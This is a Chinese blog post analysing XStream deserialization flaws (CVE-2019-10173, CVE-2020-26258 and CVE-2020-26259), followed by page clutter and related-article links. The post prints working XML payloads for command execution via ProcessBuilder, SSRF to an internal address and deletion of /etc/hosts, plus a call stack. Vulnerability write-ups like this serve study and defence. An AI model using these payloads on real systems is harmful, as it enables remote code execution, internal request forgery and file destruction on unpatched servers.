XStream反序列化

最新推荐文章于 2024-01-26 10:45:11 发布
最新推荐文章于 2024-01-26 10:45:11 发布
阅读量1.6k 收藏
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Finlinlts/article/details/120578742
版权

概述

 

XStream是Java类库,用来将对象序列化成XML(JSON)或反序列化为对象。XStream在运行时使用Java反射机制对要进行序列化的对象树的结构进行探索,并不需要对对象作出修改。XStream可以序列化内部字段,包括私private和final字段,并且支持非公开类以及内部类。在缺省情况下,XStream不需要配置映射关系,对象和字段将映射为同名XML元素。但是当对象和字段名与XML中的元素名不同时,XStream支持指定别名。XStream支持以方法调用的方式,或是Java标注的方式指定别名。XStream在进行数据类型转换时,使用系统缺省的类型转换器。同时,也支持用户自定义的类型转换器。

CVE-2019-10173

包含类型信息的流在unmarshalling时,会再次创建之前写入的对象。因此XStream会基于这些类型信息创建新的实例。攻击者可以操控XML数据,将恶意命令注入在在可以执行任意shell命令的对象中,实现漏洞的利用。

该漏洞原本是CVE-2013-7285,然而 在com.thoughtworks.xstream.converters.reflection.ReflectionConverter类中,canConvert方法中的type != eventHandlerType被删除了,使得原来的漏洞利用方式可以再次被利用。 由于在Xstream1.4.10中的com.thoughtworks.xstream.XStream类增加了setupDefaultSecurity()方法和InternalBlackList转换器,通过黑名单的形式对漏洞进行防御。但是安全模式默认不开启,必须在初始化后才可以使用,eg:XStream.setupDefaultSecurity(xStream)。导致防御失效,造成漏洞的第二次出现。

利用payload

<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<acc>1</acc>
<target class="java.lang.ProcessBuilder">
<command>
<string>touch</string>
<string>/tmp/success</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>

CVE-2020-26258,CVE-2020-26259

在运行XStream的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成服务端请求伪造/任意文件删除。

 调用栈

getInputStream:107, URLDataSource (javax.activation)
get:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)

CVE-2020-26258 SSRF payload

<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='javax.activation.URLDataSource'>
<url>http://192.168.56.101:4444/internal/</url>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>

CVE-2020-26259 DeleteFile payload

<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
<tempFile>/etc/hosts</tempFile>
</is>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>

参考链接

[1]XStream 组件高危漏洞分析与利用

[2]XStream CVE-2019-10173漏洞分析|NOSEC安全讯息平台 - 白帽汇安全研究院

[3]CVE-2020-26258&26259:XStream漏洞复现 - 云+社区 - 腾讯云

[4][CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞_公众号shadow sock7-CSDN博客

Finlinlts
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xstream反序列化流程分析1
08-03
xstream反序列化流程分析测试demo代码如下所示:跟入 com.thoughtworks.xstream 的 fromXML 函数,接收前端传入的 Str
Java 反序列化XStream 反序列化
YJ_12340的博客
06-26 320
XStream 是一个简单的基于 Java 库,Java 对象序列化到 XML,反之亦然(即:可以轻易的将 Java 对象和 XML 文档相互转换)。
亿赛通电子文档安全管理系统 XStream反序列化 RCE
最新发布
qq_36334672的博客
01-26 321
【代码】亿赛通电子文档安全管理系统 XStream反序列化 RCE。
xstream反序列化
weixin_48776804的博客
06-06 724
xstream反序列化
『Java安全』XStream 1.4-1.4.6&1.4.10反序列化漏洞CVE-2013-7285复现与浅析
Ho1aAs‘s Blog
08-12 1729
# 漏洞简介 当XStream反序列化了一个动态代理类,再调用该动态代理类所声明的接口的方法时,就能够触发任意命令执行 > XStream序列化和反序列化分析:https://ho1aas.blog.csdn.net/article/details/126250860 > 动态代理:https://ho1aas.blog.csdn.net/article/details/121647387 # 影响版本 XStream 1.4-1.4.6、1.4.10............
『Java安全』XStream基础使用与序列化和反序列化源码浅析
Ho1aAs‘s Blog
08-10 950
XStream is a simple library to serialize objects to XML and back again. 简介 依赖 基础使用demo JavaBean对象 代码 序列化结果 反序列化结果 同一对象序列化和反序列化的一致性 进阶操作 给标签起别名 将对象属性转化为XML标签属性 添加隐式集合 设置变量不被序列化 XStream核心结构图 浅析XStream序列化操作的源码 参考 完.......................................
XStream CVE-2019-10173漏洞分析
fnmsd的博客
08-01 4766
前言 首发NOSEC 该漏洞为CVE-2013-7285的补丁“绕过”。 这是一个很迷的洞,POC与CVE-2013-7285一毛一样,该Poc在XStream <=1.4.6和1.4.10上可用,也就是说开始修复的漏洞后来又出现了。 **吐句槽:**漏洞修复的版本在为1.4.11为2018年10月份发布,然后CVE编号是2019年的= = 官方关于漏洞这么写的(感谢Badcode师傅给的...
xstream序列化与反序列化
06-07
xstream中xml与javaBean的互转
使用XStream序列化/反序列化对象
11-01
使用XStream序列化/反序列化对象
Bboss和xstream序列化反序列化性能对比1
08-08
Bboss和xstream序列化反序列化性能对比1
XStream对象序列化
06-22
使用 XStream 把 Java 对象序列化为 XML
java xstream组件反序列化漏洞复现
Shanfenglan's blog
12-16 2380
文章目录前言1. CVE-2021-213511.1 利用2. CVE-2021-295052.1 利用 前言 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn_-RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。
XStream反序列化漏洞分析
weixin_44825990的博客
11-25 1657
XStream反序列化漏洞分析
com.thoughtworks.xstream.converters.reflection.ReflectionConverter,用XSTream将xml转换为Java对象
一条道上的小蜗牛
11-22 2490
将XML文件转换为object对象 XML包含:有对custs下标签含有: Java对象: @XStreamAlias("bcc:CustProperty") private List<sames> custProperty; 出现报错: com.thoughtworks.xstream.converters.reflection.ReflectionConverter...
xstream 反序列化漏洞研究与修复
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
03-17 4526
文章目录1、简介2、举例3、漏洞4、修复 1、简介 xstream是一个用于序列化和反序列化的java库,主要是java对象和xml之间相互转换。 XStream反序列化同fastjson这种不一样的地方是fastjson会在反序列化的时候主动去调用getters和setters,而XStream反序列化过程中赋值都有Java的反射机制来完成,所以并没有这样主动调用的特性。 特点 使用方便 - XStream的API提供了一个高层次外观,以简化常用的用例 无需创建映射 - XStream的API提供了默
XStream解析XML,转化为Java Bean对象时,XML多余节点报错处理
null
12-04 2859
使用XStream解析XML,转化为Java Bean对象时,如果XML中出现未在Java Bean中定义的属性,会报错,报错信息如下: Exception in thread "main" com.thoughtworks.xstream.converters.reflection.AbstractReflectionConverter$UnknownFieldException: No suc...
XStream反序列化漏洞分析二
weixin_44825990的博客
12-13 668
XStream反序列化流程及CVE-2020-26217漏洞分析
java xstream_xstream实现对象的序列化和反序列化(Java)
weixin_34355360的博客
02-16 430
概述最新整理Java方面XML序列化和反序列化的常用工具类,找到了dom4j和xstream。dom4j相对小巧,很好的解读xml;但是对于对象的xml序列化和反序列化,我还是比较喜欢xsteam(ps:个人爱好吧),这里整理xstream的入门基础知识;使用引用maven内容com.thoughtworks.xstreamxstream1.4.8别名配置的方式1、可以通过类注解实现@XStrea...
xstream实现xml序列化
04-01
XStream是一种Java库,它可以将Java对象序列化为XML格式,并且还可以将XML格式反序列化为Java对象。XStream可以非常方便地将Java对象转换为XML格式的字符串,也可以将XML格式的字符串转换为Java对象。XStream的使用非常简单,只需要创建一个XStream对象,然后调用toXML()方法将Java对象序列化为XML格式的字符串,或者调用fromXML()方法将XML格式的字符串反序列化为Java对象。 下面是一个简单的示例,演示如何使用XStream将Java对象序列化为XML格式的字符串: ``` import com.thoughtworks.xstream.XStream; public class Person { private String name; private int age; // 省略getter和setter方法 public static void main(String[] args) { Person person = new Person(); person.setName("张三"); person.setAge(25); XStream xstream = new XStream(); String xml = xstream.toXML(person); System.out.println(xml); } } ``` 在上面的代码中,我们创建了一个Person对象,并设置了name和age属性的值。然后,我们创建了一个XStream对象,并调用toXML()方法将Person对象序列化为XML格式的字符串。最后,我们将序列化后的字符串打印出来。 输出结果如下: ``` <person> <name>张三</name> <age>25</age> </person> ``` 可以看到,XStream将Java对象序列化为了XML格式的字符串,并且为每个属性添加了相应的XML标签。在这个例子中,我们只有两个属性,因此只有两个XML标签。如果有更多的属性,XStream会为每个属性添加相应的XML标签。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值